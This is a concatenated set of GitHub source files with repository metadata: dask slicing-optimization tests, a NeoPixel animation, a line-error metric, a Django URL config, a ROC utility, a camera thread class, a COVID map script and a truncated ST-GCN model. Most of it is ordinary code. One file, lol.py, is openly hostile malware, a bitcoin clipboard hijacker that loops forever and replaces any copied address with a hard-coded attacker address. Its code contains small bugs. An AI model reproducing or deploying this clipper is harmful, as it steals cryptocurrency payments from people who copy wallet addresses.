38396747+timmy61109@users.noreply.github.com
|
8133a16cd96532f6ca7047d4e587715a62563cb5
|
2f41e741b6185ca53f835e8fa2a388e142354f44
|
/lib/python2.7/site-packages/dask/array/tests/test_optimization.py
|
4b770203037e000c87b4d4038382fdb4dce2a098
|
[] |
no_license
|
honheil/pic-get
|
4ce7f58a5d5d34537942ccd24e9783af4f7f2b1a
|
b1317ae11fd99163a192303a3c43a9420c81bf2f
|
refs/heads/master
| 2022-10-15T21:36:06.890386
| 2017-03-18T21:35:22
| 2017-03-18T21:35:22
| 84,936,928
| 0
| 1
| null | 2022-10-09T09:50:36
| 2017-03-14T10:36:16
|
Python
|
UTF-8
|
Python
| false
| false
| 4,866
|
py
|
import pytest
pytest.importorskip('numpy')
from dask.optimize import fuse
from dask.array.optimization import (getitem, optimize, optimize_slices,
fuse_slice)
from dask.array.core import getarray, getarray_nofancy
def test_fuse_getitem():
pairs = [((getarray, (getarray, 'x', slice(1000, 2000)), slice(15, 20)),
(getarray, 'x', slice(1015, 1020))),
((getitem, (getarray, 'x', (slice(1000, 2000), slice(100, 200))),
(slice(15, 20), slice(50, 60))),
(getarray, 'x', (slice(1015, 1020), slice(150, 160)))),
((getitem, (getarray_nofancy, 'x', (slice(1000, 2000), slice(100, 200))),
(slice(15, 20), slice(50, 60))),
(getarray_nofancy, 'x', (slice(1015, 1020), slice(150, 160)))),
((getarray, (getarray, 'x', slice(1000, 2000)), 10),
(getarray, 'x', 1010)),
((getitem, (getarray, 'x', (slice(1000, 2000), 10)),
(slice(15, 20),)),
(getarray, 'x', (slice(1015, 1020), 10))),
((getitem, (getarray_nofancy, 'x', (slice(1000, 2000), 10)),
(slice(15, 20),)),
(getarray_nofancy, 'x', (slice(1015, 1020), 10))),
((getarray, (getarray, 'x', (10, slice(1000, 2000))),
(slice(15, 20), )),
(getarray, 'x', (10, slice(1015, 1020)))),
((getarray, (getarray, 'x', (slice(1000, 2000), slice(100, 200))),
(slice(None, None), slice(50, 60))),
(getarray, 'x', (slice(1000, 2000), slice(150, 160)))),
((getarray, (getarray, 'x', (None, slice(None, None))),
(slice(None, None), 5)),
(getarray, 'x', (None, 5))),
((getarray, (getarray, 'x', (slice(1000, 2000), slice(10, 20))),
(slice(5, 10),)),
(getarray, 'x', (slice(1005, 1010), slice(10, 20)))),
((getitem, (getitem, 'x', (slice(1000, 2000),)),
(slice(5, 10), slice(10, 20))),
(getitem, 'x', (slice(1005, 1010), slice(10, 20))))]
for inp, expected in pairs:
result = optimize_slices({'y': inp})
assert result == {'y': expected}
def test_optimize_with_getitem_fusion():
dsk = {'a': 'some-array',
'b': (getarray, 'a', (slice(10, 20), slice(100, 200))),
'c': (getarray, 'b', (5, slice(50, 60)))}
result = optimize(dsk, ['c'])
expected = {'c': (getarray, 'some-array', (15, slice(150, 160)))}
assert result == expected
def test_optimize_slicing():
dsk = {'a': (range, 10),
'b': (getarray, 'a', (slice(None, None, None),)),
'c': (getarray, 'b', (slice(None, None, None),)),
'd': (getarray, 'c', (slice(0, 5, None),)),
'e': (getarray, 'd', (slice(None, None, None),))}
expected = {'e': (getarray, (range, 10), (slice(0, 5, None),))}
result = optimize_slices(fuse(dsk, [])[0])
assert result == expected
# protect output keys
expected = {'c': (getarray, (range, 10), (slice(0, None, None),)),
'd': (getarray, 'c', (slice(0, 5, None),)),
'e': (getarray, 'd', (slice(None, None, None),))}
result = optimize_slices(fuse(dsk, ['c', 'd', 'e'])[0])
assert result == expected
def test_fuse_slice():
assert fuse_slice(slice(10, 15), slice(0, 5, 2)) == slice(10, 15, 2)
assert (fuse_slice((slice(100, 200),), (None, slice(10, 20))) ==
(None, slice(110, 120)))
assert (fuse_slice((slice(100, 200),), (slice(10, 20), None)) ==
(slice(110, 120), None))
assert (fuse_slice((1,), (None,)) ==
(1, None))
assert (fuse_slice((1, slice(10, 20)), (None, None, 3, None)) ==
(1, None, None, 13, None))
with pytest.raises(NotImplementedError):
fuse_slice(slice(10, 15, 2), -1)
def test_fuse_slice_with_lists():
assert fuse_slice(slice(10, 20, 2), [1, 2, 3]) == [12, 14, 16]
assert fuse_slice([10, 20, 30, 40, 50], [3, 1, 2]) == [40, 20, 30]
assert fuse_slice([10, 20, 30, 40, 50], 3) == 40
assert fuse_slice([10, 20, 30, 40, 50], -1) == 50
assert fuse_slice([10, 20, 30, 40, 50], slice(1, None, 2)) == [20, 40]
def test_hard_fuse_slice_cases():
dsk = {'x': (getarray, (getarray, 'x', (None, slice(None, None))),
(slice(None, None), 5))}
assert optimize_slices(dsk) == {'x': (getarray, 'x', (None, 5))}
def test_dont_fuse_fancy_indexing_in_getarray_nofancy():
dsk = {'a': (getitem, (getarray_nofancy, 'x', (slice(10, 20, None), slice(100, 200, None))),
([1, 3], slice(50, 60, None)))}
assert optimize_slices(dsk) == dsk
dsk = {'a': (getitem, (getarray_nofancy, 'x', [1, 2, 3]), 0)}
assert optimize_slices(dsk) == dsk
|
[
"honheil@ymail.com"
] |
honheil@ymail.com
|
4f050260275dbcff6d7c7199439d9a6b5f3113e7
|
18f0ad99e21e2e35126f8c3c28079d358fa2129a
|
/QTPy_Heart/code.py
|
6c3ff81419af412798c2acf0e99934d7ca0fec34
|
[
"MIT"
] |
permissive
|
ladyada/Adafruit_Learning_System_Guides
|
9bf18dfa35941e0cbecbb3c2d02b4fa3cb79744f
|
6d76801878cbf65132ccea950dc47ae842c73dcd
|
refs/heads/master
| 2023-08-20T20:30:42.910576
| 2022-01-10T20:28:11
| 2022-01-10T20:28:11
| 115,837,894
| 13
| 2
|
MIT
| 2020-03-31T23:23:45
| 2017-12-31T02:34:47
|
C
|
UTF-8
|
Python
| false
| false
| 455
|
py
|
import board
import neopixel
from adafruit_led_animation.animation.pulse import Pulse
from adafruit_led_animation.color import RED
# Update to match the pin connected to your NeoPixels
pixel_pin = board.D1
# Update to match the number of NeoPixels you have connected
pixel_num = 6
pixels = neopixel.NeoPixel(pixel_pin, pixel_num, brightness=0.5, auto_write=False)
pulse = Pulse(pixels, speed=0.01, color=RED, period=1)
while True:
pulse.animate()
|
[
"noe@adafruit.com"
] |
noe@adafruit.com
|
52bd0d1126ac9b38f2fa9a5c77910bb87a1298e6
|
3bda0a4b4f8476974bff96dd52974e6974108a4e
|
/dAAMs/lineerror.py
|
fa18515637cc010a7b4c3f4611ae5e9bd51a8fdc
|
[
"MIT"
] |
permissive
|
yuxiang-zhou/DenseDeformableModel
|
d0fde03cc266dc495201b3a2c9d978d2b931dbf8
|
0239d32f7694894c1dc564d4fd7131d0b7862ebc
|
refs/heads/master
| 2020-03-21T15:46:58.832222
| 2018-06-26T12:11:26
| 2018-06-26T12:11:26
| 138,732,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,209
|
py
|
__author__ = 'yz4009'
import numpy as np
from scipy.interpolate import interp1d
from menpo.shape import PointCloud
def arclen_polyl(cnt):
tang = np.diff(cnt, axis=0)
seg_len = np.sqrt(np.power(tang[:, 0], 2) + np.power(tang[:, 1], 2))
seg_len = np.hstack((0, seg_len))
alparam = np.cumsum(seg_len)
cntLen = alparam[-1]
return alparam, cntLen
def interpolate(points, step, kind='slinear'):
alparam, cntLen = arclen_polyl(points)
#[_,index_x]=np.unique(points[:, 0], return_index=True)
#index_x = np.sort(index_x)
#f_x = interp1d(
# alparam[index_x], points[index_x, 0], kind='cubic'
#)
#[_,index_y]=np.unique(points[:, 1], return_index=True)
#index_y = np.sort(index_y)
#f_y = interp1d(
# alparam[index_y], points[index_y, 1], kind='cubic'
#)
f_x = interp1d(
alparam, points[:, 0], kind=kind
)
f_y = interp1d(
alparam, points[:, 1], kind=kind
)
points_dense_x = f_x(np.arange(0, cntLen, step))
points_dense_y = f_y(np.arange(0, cntLen, step))
points_dense = np.hstack((
points_dense_x[:, None], points_dense_y[:, None]
))
return points_dense
def line_diff(l1, l2):
Na = l1.shape[0]
Nb = l2.shape[0]
diffs_x = np.repeat(l1[:, 0][:, None], Nb, axis=1) \
- np.repeat(l2[:, 0][None, :], Na, axis=0)
diffs_y = np.repeat(l1[:, 1][:, None], Nb, axis=1) \
- np.repeat(l2[:, 1][None, :], Na, axis=0)
euclidien = diffs_x*diffs_x+diffs_y*diffs_y
msd_ab = np.mean(np.min(euclidien, 0))
msd_ba = np.mean(np.min(euclidien, 1))
return msd_ab, msd_ba
def compute_line_error(pts1, pts2, gp):
pts1 = pts1.points if isinstance(pts1, PointCloud) else pts1
pts2 = pts2.points if isinstance(pts2, PointCloud) else pts2
error = 0
length = 0
for g in gp:
gl1 = pts1[g, :]
gl2 = pts2[g, :]
gl1 = interpolate(gl1, 0.5)
gl2 = interpolate(gl2, 0.5)
_, tl1 = arclen_polyl(gl1)
_, tl2 = arclen_polyl(gl2)
d1, d2 = line_diff(gl1, gl2)
error += np.sum(np.sqrt([d1*tl1, d2*tl2])) / (tl1 + tl2)
length += (tl1 + tl2) / 2
return error / length
|
[
"yuxiang.zhou10@imperial.ac.uk"
] |
yuxiang.zhou10@imperial.ac.uk
|
126f8dcda50d7a1c951fcde8cb0f76ea4a0ad244
|
f6d56f56c7ab25e2474c9283e975151d7bf080ed
|
/kube-manager/kube_manager/urls.py
|
402f4d0dbd4c5f9420769278746d60df582cdd04
|
[] |
no_license
|
tushar-lb/task-manager
|
ffd022109be51d5a26946745f845c32de923c6c8
|
d3aab97d25f56eacefcd43d28245b3fc5a8f622b
|
refs/heads/master
| 2022-11-08T21:53:58.246174
| 2020-07-02T19:29:48
| 2020-07-02T19:29:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,077
|
py
|
"""kube_manager URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from kube_manager_portal.views import *
from rest_framework_swagger.views import get_swagger_view
from rest_framework.documentation import include_docs_urls
schema_view = get_swagger_view(title='KubeManager APIs')
urlpatterns = [
url('^$', schema_view),
url(r'^admin/', admin.site.urls),
url(r'^app/', include('kube_manager_portal.urls')),
]
|
[
"galaxy.tusharraut@gmail.com"
] |
galaxy.tusharraut@gmail.com
|
1e2291bfc53508b9a3c3f5cb5a655df9ea1c904c
|
7462d58d01247a784fa73617728842c652076911
|
/calculation/roc.py
|
7ef0eeb551cd131852577f9e5b5cd8ba1e6a66e6
|
[
"MIT"
] |
permissive
|
mike10004/smatterscripts
|
270c30c1d4c28f74737e6878d2cf7517e5820276
|
d1fc9c0a3b85b5f30a0b170508a4cd789665e820
|
refs/heads/master
| 2020-06-05T09:14:07.340904
| 2019-07-30T15:54:49
| 2019-07-30T15:54:49
| 30,710,157
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,720
|
py
|
#!/usr/bin/env python3
"""Perform receiver-operating characteristic transform on input values."""
import csv
import re
import os
import sys
import json
import errno
import logging
import _common
import calculation
from _common import predicates
from typing import Callable, TextIO, List, Any, Pattern, Dict, Sequence, Tuple, Optional, Union, Iterable, Iterator
from argparse import ArgumentParser, Namespace
from . import ValueParser, Ignorer
_log = logging.getLogger(__name__)
class Element(object):
def __init__(self, evaluator: Callable[[Any], bool], ground_truthist: Union[bool, Callable[[], bool]]):
self.evaluator = evaluator
self.ground_truthist = ground_truthist
self._ground_truth = ground_truthist if isinstance(ground_truthist, bool) else None
def evaluate(self, threshold):
return self.evaluator(threshold)
def ground_truth(self):
if self._ground_truth is None:
self._ground_truth = self.ground_truthist()
return self._ground_truth
@classmethod
def list(cls, values: Iterator, ground_truth: bool):
return list(map(lambda v: Element(_make_evaluator(v), ground_truth), values))
def roc_transform(elements: Sequence[Element], threshold_domain: Iterable) -> Dict[float, Tuple[float, float]]:
known_positives = sum(element.ground_truth() for element in elements)
known_negatives = sum(not element.ground_truth() for element in elements)
if known_positives == 0 or known_negatives == 0:
_log.warning("known positives = %d, known negatives = %d", known_positives, known_negatives)
roc = {}
for threshold in threshold_domain:
false_positives, false_negatives = 0, 0
for element in elements:
expected = element.ground_truth()
actual = element.evaluate(threshold)
if expected and not actual: ## known positives
false_negatives += 1
elif not expected and actual: ## known negative
false_positives += 1
roc[threshold] = (false_positives / known_negatives, false_negatives / known_positives)
return roc
def decide_domain(values: Iterator[float], domain_size: int=None, epsilon=1e-5) -> Iterator[float]:
sorted_vals = sorted(values)
assert len(sorted_vals) > 0, "zero elements in input"
min_value, max_value = sorted_vals[0], sorted_vals[-1]
width = max_value - min_value
if width == 0:
if domain_size is not None and domain_size != 1:
raise ValueError("only one element in threshold domain")
return [min_value].__iter__()
domain_size = 100 if domain_size is None else domain_size
step = (width + epsilon) / domain_size
return map(lambda i: min_value + (i * step), range(domain_size))
def _make_evaluator(value):
return lambda threshold: value >= threshold
def main(argl: Sequence[str]=None, ofile: TextIO=sys.stdout) -> 0:
parser = ArgumentParser()
parser.add_argument("known_positives")
parser.add_argument("known_negatives")
parser.add_argument("--invert", action='store_true', help="invert input values")
parser.add_argument("--domain", type=float, nargs=2, metavar=("MIN", "STEP"), help="threshold domain")
parser.add_argument("--domain-size", "-n", type=int, default=100, metavar="N", help="threshold domain size")
_common.add_logging_options(parser)
args = parser.parse_args(argl)
_common.config_logging(args)
value_type = float
invert = args.invert
parse_fn = calculation.build_parse_value(value_type, invert)
value_parser = ValueParser(parse_fn, predicates.always_true())
with open(args.known_positives, 'r') as ifile:
known_positives = value_parser.read_values(ifile)
with open(args.known_negatives, 'r') as ifile:
known_negatives = value_parser.read_values(ifile)
_log.debug(" parsed %d known positives and %d known negatives", len(known_positives), len(known_negatives))
positive_elements = Element.list(known_positives, True)
negative_elements = Element.list(known_negatives, False)
all_elements = positive_elements + negative_elements
if args.domain is None:
threshold_domain = decide_domain(known_positives + known_negatives, args.domain_size)
else:
t_min, t_step = args.domain
threshold_domain = [t_min + i * t_step for i in range(args.domain_size)]
roc = roc_transform(all_elements, threshold_domain)
roc_keys = sorted(roc.keys())
writer = csv.writer(ofile, delimiter="\t")
for threshold in roc_keys:
false_pos_rate, false_neg_rate = roc[threshold]
row = [threshold, false_pos_rate, false_neg_rate]
writer.writerow(row)
return 0
|
[
"mchaberski@novetta.com"
] |
mchaberski@novetta.com
|
e1753a9b57a697ecc0d4fd06df813330e9c4dbee
|
ee01a7b228c6705b389a2aa7900019dd1cd25e77
|
/cam_accelerate.py
|
de2a28e8bdddae0e112fd5d36c51b3ca2d84b7a1
|
[] |
no_license
|
DDDDDaryl/guidance_line_extraction
|
a14f3bb2c4fc4274d440b3e7b2ec57aa3a96dc89
|
ff5d5099bbef0b93fb175cf9dd73370f64e8e1a4
|
refs/heads/master
| 2023-04-08T07:16:00.811959
| 2021-04-05T13:48:20
| 2021-04-05T13:48:20
| 350,697,534
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 993
|
py
|
import threading
import cv2
class camCapture:
def __init__(self, dev):
self.Frame = 0
self.status = False
self.isstop = False
# 摄影机连接。
self.capture = cv2.VideoCapture(dev)
# self.capture.set(3, 1280)
# self.capture.set(4, 720)
def isOpened(self):
return self.capture.isOpened()
def start(self):
# 把程序放进子线程,daemon=True 表示该线程会随着主线程关闭而关闭。
print('cam started!')
threading.Thread(target=self.queryframe, daemon=True, args=()).start()
def stop(self):
# 记得要设计停止无限循环的开关。
self.isstop = True
print('cam stopped!')
def getframe(self):
# 当有需要影像时,再回传最新的影像。
return self.Frame
def queryframe(self):
while (not self.isstop):
self.status, self.Frame = self.capture.read()
self.capture.release()
|
[
"954562905@qq.com"
] |
954562905@qq.com
|
d751681b069ad21dbf0c56aae742b467d7fc2350
|
92dbb16f383754fd9fd8d35c87b68977ec42a586
|
/data/20200521-graph/GA_week.py
|
1791ce0447a110c3ecd410453f070ddf7d372e47
|
[] |
no_license
|
YWJL/pchong
|
c0c1bfa4695ac3b143430fd2291b197b4fdab884
|
eaa98c5ed3daad60e8ac0560634ba631e665f00e
|
refs/heads/master
| 2022-11-11T00:01:55.550199
| 2020-07-01T06:11:56
| 2020-07-01T06:11:56
| 276,290,019
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,686
|
py
|
import pandas as pd
#coding:utf-8
import asyncio
import os
from pyecharts import options as opts
from pyecharts.charts import Map, Timeline
from pyecharts.faker import Faker
from aiohttp import TCPConnector, ClientSession
from typing import List
import pyecharts.options as opts
from pyecharts.globals import ThemeType
from pyecharts.commons.utils import JsCode
from pyecharts.charts import Timeline, Grid, Bar, Map, Pie, Line
import json
async def get_json_data(url: str) -> dict:
async with ClientSession(connector=TCPConnector(ssl=False)) as session:
async with session.get(url=url) as response:
return await response.json()
Js_data = asyncio.run(
get_json_data(url="https://coronavirus.1point3acres.com/resources/maps/us_map/GA.json")
) #或者这样获取网页json
with open('GA.json', 'r') as f:
Js_2data=json.loads(f.read())
name='20200521-us_state-data.json.csv'
DATA=pd.read_csv(name)
print(len(DATA.columns.values))
day=len(DATA.columns.values)-3
print(DATA.columns.values[-1])#列名
# print(Positive)
print(DATA.iloc[0,0])
Country=[]
Pos=[]
print(DATA)
for i in range(1,144):
Country.append(DATA.iloc[i+388,2])
Pos.append(float(DATA.iloc[i+388,-1]))
MAP_data=[list(z) for z in zip(Country,Pos)]
print(MAP_data)
# with open('20200508-GA-data.json', 'r') as f:
# data2=json.loads(f.read())
# print(data2)
print(sum(Pos))
rate=100000/sum(Pos)
Posi_7=[]
Posi_6=[]
Posi_5=[]
Posi_4=[]
Posi_3=[]
Posi_2=[]
Posi_1=[]
pos_account1=[]
pos_account3=[]
pos_account5=[]
pos_account7=[]
for i in range(1,144):
Posi_1.append(float(DATA.iloc[i+388,-1]))
Posi_2.append(float(DATA.iloc[i + 388, -2]))
Posi_3.append(float((int(DATA.iloc[i+388,-1]))-int(DATA.iloc[i+388,-3]))/3/(int(DATA.iloc[i + 388, -1])))
Posi_4.append(float(DATA.iloc[i + 388, -4]))
Posi_5.append(float((int(DATA.iloc[i+388,-1]))-int(DATA.iloc[i+388,-5]))/5/(int(DATA.iloc[i + 388, -1])))
Posi_6.append(float(DATA.iloc[i + 388, -6]))
Posi_7.append(float((int(DATA.iloc[i+388,-1]))-int(DATA.iloc[i+388,-7]))/7/(int(DATA.iloc[i + 388, -1])))
pos_account1.append(int(DATA.iloc[i+388,-1]))
pos_account3.append(int(DATA.iloc[i+388,-3]))
pos_account5.append(int(DATA.iloc[i+388,-5]))
pos_account7.append(int(DATA.iloc[i+388,-7]))
account3=float((sum(pos_account1)-sum(pos_account3))/3/(sum(pos_account1)))
account5=(sum(pos_account1)-sum(pos_account5))/5/(sum(pos_account1))
account7=(sum(pos_account1)-sum(pos_account7))/7/(sum(pos_account1))
print(sum(pos_account1))
# account_pos='%.2f%%' % (account_pos * 100)
account3='%.2f%%' % (account3 * 100)
account5='%.2f%%' % (account5 * 100)
account7='%.2f%%' % (account7 * 100)
POS3=[]
POS5=[]
POS7=[]
num=[]
for i in range(0,143):
a=Posi_3[i]*100
POS3.append('%.4f' % a)
b=Posi_5[i]*100
POS5.append('%.4f' % b)
c=Posi_7[i]*100
POS7.append('%.4f' % c)
num.append(a)
num.append(b)
num.append(c)
Standard_data_7=[list(z) for z in zip(Country,Posi_7)]
pos={}
pos[0]=[list(z) for z in zip(Country,Posi_1)]
pos[1]=[list(z) for z in zip(Country,Posi_2)]
pos[2]=[list(z) for z in zip(Country,POS3)]
pos[3]=[list(z) for z in zip(Country,Posi_4)]
pos[4]=[list(z) for z in zip(Country,POS5)]
pos[5]=[list(z) for z in zip(Country,Posi_6)]
pos[6]=[list(z) for z in zip(Country,POS7)]
print('Posi_7',Posi_7)
print(pos[6])
test3=[list(z) for z in zip(Country,Posi_3)]
test5=[list(z) for z in zip(Country,Posi_5)]
test7=[list(z) for z in zip(Country,Posi_7)]
print(test7)
print(float(DATA.iloc[387,-1])/(DATA.iloc[387, -7])-1)
print(DATA.iloc[389,2])
time="2020/{}Georgia疫情情况".format(DATA.columns.values[-1])
tl = Timeline()
i=1
a=0
a=(int(DATA.iloc[i+388,-1])+int(DATA.iloc[i+388,-2]))
# print(float((DATA.iloc[i+388,-1])+(DATA.iloc[i+388,-2])+(DATA.iloc[i+388,-3]))/(DATA.iloc[i + 388, -3]))
print(a)
map_ga = (
Map(init_opts=opts.InitOpts(width="1400px", height="800px"))
.add_js_funcs("echarts.registerMap('GA', {});".format(Js_2data))
.add(
series_name="至{}天前确诊病例数".format(2+1),
maptype="GA",
data_pair=pos[2],
# name_map=NAME_MAP_DATA,
is_map_symbol_show=False, # 红点标记
# itemstyle_opts={Timeline
# },
)
.add(
series_name="至{}天前确诊病例数".format(4+1),
maptype="GA",
data_pair=pos[4],
# name_map=NAME_MAP_DATA,
is_map_symbol_show=False, # 红点标记
# itemstyle_opts={Timeline
# },
)
.add(
series_name="至{}天前确诊病例数".format(7),
maptype="GA",
data_pair=pos[6],
# name_map=NAME_MAP_DATA,
is_map_symbol_show=False, # 红点标记
# itemstyle_opts={Timeline
# },
)
.set_global_opts(
title_opts=opts.TitleOpts(
title=time,
subtitle="近七天感染人数增长比:{} 近五天:{} 近三天:{}".format(account7,account5,account3),
pos_top="4%",
pos_left="45%"
),
tooltip_opts=opts.TooltipOpts(
trigger="item", formatter="{b0}:{c0}%" # {a}<br/>:{c0}此为换行
),
visualmap_opts=opts.VisualMapOpts(
min_=min(num),
max_=max(num),
range_text=["High", "Low"],
is_calculable=True,
range_color=["lightskyblue", "yellow", "orangered"],
),
)
.render("Georgia州近七天感染状况.html"))
# print(max(Posi_7))
|
[
"201256153@qq.com"
] |
201256153@qq.com
|
480d75ae64301371ba3162c4d02210e80e4abcb0
|
ecfb1f52fd7a1c708e65fb3060a29cd853cd58d8
|
/lol.py
|
79c43b9b063ea81d659c38b42b39ecdf29deb23f
|
[
"Apache-2.0"
] |
permissive
|
DarkhackerTH/README
|
593fd16c186e9470ee9c247ee654cde03a5c9490
|
a22e5581543250660616bf06e6bbb0f12afdecc7
|
refs/heads/master
| 2020-04-12T04:27:16.965747
| 2018-12-18T14:22:13
| 2018-12-18T14:22:13
| 162,296,142
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 622
|
py
|
import subprocess
destination_address = b'1FfmbHfnpaZjKFvyi1okTjJJusN455paPH'
def get_clipboard():
p = subprocess.popen(['pbpaste'], stdout=subprocess.PIPE) # acces clipboard
data = str(p.stdout.read()) # read data on clipboard on converte to string
if len(data) > 33: # if bitcoin address
swap_address(data)
def swap_address(data):
p = subprocess.popen(['pbcopy'], stdin=subprocess.PIPE) # access clipboard
p.stdin.write(destination_address) # write destination address
p.stdin.write(destination_address) # write destination address
p.stdin.close# ()
while True:
get_clipboard()
|
[
"noreply@github.com"
] |
DarkhackerTH.noreply@github.com
|
09441d31864319e46938943499e4d9556c12ac0b
|
c3bd566cacbd02eba80a9d0b8278ea40b80de4b0
|
/game.py
|
77591c2ccb7def25b230f6b7ccc6124e6aecc8fd
|
[] |
no_license
|
bella1116/Pre-Interview
|
4c3c0627c17b4c752995db386255e87f99dda8e5
|
07470610d25ed74fbab650075bc1917c3c6c851e
|
refs/heads/master
| 2023-05-28T18:09:02.460407
| 2021-06-11T17:32:57
| 2021-06-11T17:32:57
| 374,991,228
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,386
|
py
|
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QApplication, QWidget
from PyQt5.QtWidgets import QLayout, QGridLayout
from PyQt5.QtWidgets import QTextEdit, QLineEdit, QToolButton
from hangman import Hangman
from guess import Guess
from word import Word
class HangmanGame(QWidget):
def __init__(self, parent=None):
super().__init__(parent)
# Initialize word database
self.word = Word('words.txt')
# Hangman display window
self.hangmanWindow = QTextEdit()
self.hangmanWindow.setReadOnly(True)
self.hangmanWindow.setAlignment(Qt.AlignLeft)
font = self.hangmanWindow.font()
font.setFamily('Courier New')
self.hangmanWindow.setFont(font)
# Layout
hangmanLayout = QGridLayout()
hangmanLayout.addWidget(self.hangmanWindow, 0, 0)
# Status Layout creation
statusLayout = QGridLayout()
# Display widget for current status
self.currentWord = QLineEdit()
self.currentWord.setReadOnly(True)
self.currentWord.setAlignment(Qt.AlignCenter)
font = self.currentWord.font()
font.setPointSize(font.pointSize() + 8)
self.currentWord.setFont(font)
#화면 폭 확장 - 19자 까지 표시 가능
statusLayout.addWidget(self.currentWord, 0, 0, 1, 30)
# Display widget for already used characters
self.guessedChars = QLineEdit()
self.guessedChars.setReadOnly(True)
self.guessedChars.setAlignment(Qt.AlignLeft)
self.guessedChars.setMaxLength(52)
statusLayout.addWidget(self.guessedChars, 1, 0, 1, 2)
# Display widget for message output
self.message = QLineEdit()
self.message.setReadOnly(True)
self.message.setAlignment(Qt.AlignLeft)
self.message.setMaxLength(52)
statusLayout.addWidget(self.message, 2, 0, 1, 2)
# Input widget for user selected characters
self.charInput = QLineEdit()
self.charInput.setMaxLength(1)
statusLayout.addWidget(self.charInput, 3, 0)
# Button for submitting a character
self.guessButton = QToolButton()
self.guessButton.setText('Guess!')
self.guessButton.clicked.connect(self.guessClicked)
statusLayout.addWidget(self.guessButton, 3, 1)
# Button for a new game
self.newGameButton = QToolButton()
self.newGameButton.setText('New Game')
self.newGameButton.clicked.connect(self.startGame)
statusLayout.addWidget(self.newGameButton, 4, 0)
# Layout placement
mainLayout = QGridLayout()
mainLayout.setSizeConstraint(QLayout.SetFixedSize)
mainLayout.addLayout(hangmanLayout, 0, 0)
mainLayout.addLayout(statusLayout, 0, 1)
self.setLayout(mainLayout)
self.setWindowTitle('Hangman Game')
# Start a new game on application launch!
self.startGame()
def startGame(self):
self.hangman = Hangman()
#Hangman 상태 초기화
self.guess = Guess(self.word.randFromDB())
#비밀 단어 선택
self.gameOver = False
#게임 진행 여부 초기화
self.hangmanWindow.setPlaceholderText(self.hangman.currentShape())
self.currentWord.setText(self.guess.displayCurrent())
#currentWord 내용 표시
self.guessedChars.setText(self.guess.displayGuessed())
#guessedChars 내용 표시
self.message.clear()
#message내용 표시
def guessClicked(self):
guessedChar = self.charInput.text()
self.charInput.clear()
self.message.clear()
if self.gameOver == True:
# 메시지 출력
self.message.setText("game over")
return
# 입력의 길이가 1 인지
if len(guessedChar) != 1:
self.message.setText("you should input only one letter!")
return
# 이미 사용한 글자인지
if guessedChar in self.guess.guessedChars:
self.message.setText("you already input it")
return
success = self.guess.guess(guessedChar)
if success == False:
# 남아있는 목숨 1 감소
self.hangman.decreaseLife()
# 메시지 출력
self.message.setText("Oops, it is not an answer!")
# hangmanWindow 에 현재 hangman 상태 그림을 출력
self.hangmanWindow.setText(self.hangman.currentShape())
# currentWord 에 현재까지 부분적으로 맞추어진 단어 상태를 출력
self.currentWord.setText(self.guess.displayCurrent())
# guessedChars 에 지금까지 이용한 글자들의 집합을 출력
self.guessedChars.setText(self.guess.displayGuessed())
if self.guess.finished():
# 메시지 ("Success!") 출력하고, self.gameOver 는 True 로
self.message.setText("Success!")
self.gameOver = True
elif self.hangman.getRemainingLives() == 0:
# 메시지 ("Fail!" + 비밀 단어) 출력하고, self.gameOver 는 True 로
self.message.setText("Fail! Answer: " + self.guess.secretWord)
self.gameOver = True
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
game = HangmanGame()
game.show()
sys.exit(app.exec_())
|
[
"dldpgus7@gmail.com"
] |
dldpgus7@gmail.com
|
5acfce5a82800a721f5ec417bee2535e5c49909a
|
82b2e6a1ca04728f6754219bd1996069e7fa7252
|
/models/st_gcn_VAE.py
|
00b050d8c958c2ef6afd9c575a6b37eb7a49b24e
|
[] |
no_license
|
FredHuangBia/ActionFromFuturePose
|
dd16518e29fb99eb17c9561e9e0330bee4fd2c22
|
47ae871f86eb63c5a1d0feec5cc1e6ace4dfacf6
|
refs/heads/master
| 2020-05-07T11:53:57.003380
| 2019-08-27T01:42:32
| 2019-08-27T01:42:32
| 180,480,051
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,339
|
py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from models.utils.tgcn import ConvTemporalGraphical
from models.utils.graph import Graph
class Model_VAE(nn.Module):
r"""Spatial temporal graph convolutional networks.
Args:
in_channels (int): Number of channels in the input data
num_class (int): Number of classes for the classification task
graph_args (dict): The arguments for building the graph
edge_importance_weighting (bool): If ``True``, adds a learnable
importance weighting to the edges of the graph
**kwargs (optional): Other parameters for graph convolution units
Shape:
- Input: :math:`(N, in_channels, T_{in}, V_{in}, M_{in})`
- Output: :math:`(N, num_class)` where
:math:`N` is a batch size,
:math:`T_{in}` is a length of input sequence,
:math:`V_{in}` is the number of graph nodes,
:math:`M_{in}` is the number of instance in a frame.
"""
def __init__(self, in_channels, num_class, graph_args,
edge_importance_weighting, pose=True, **kwargs):
super().__init__()
# pose forecasting or feature only
self.pose = pose
self.latent_size = 100
# load graph
self.graph = Graph(**graph_args)
A = torch.tensor(self.graph.A, dtype=torch.float32, requires_grad=False)
self.register_buffer('A', A)
# build networks
spatial_kernel_size = A.size(0)
temporal_kernel_size = 9
kernel_size = (temporal_kernel_size, spatial_kernel_size)
self.data_bn = nn.BatchNorm1d(in_channels * A.size(1))
self.st_gcn_networks = nn.ModuleList((
s_gcn(in_channels, 16, kernel_size, 1, residual=False, **kwargs),
s_gcn(16, 16, kernel_size, 1, **kwargs),
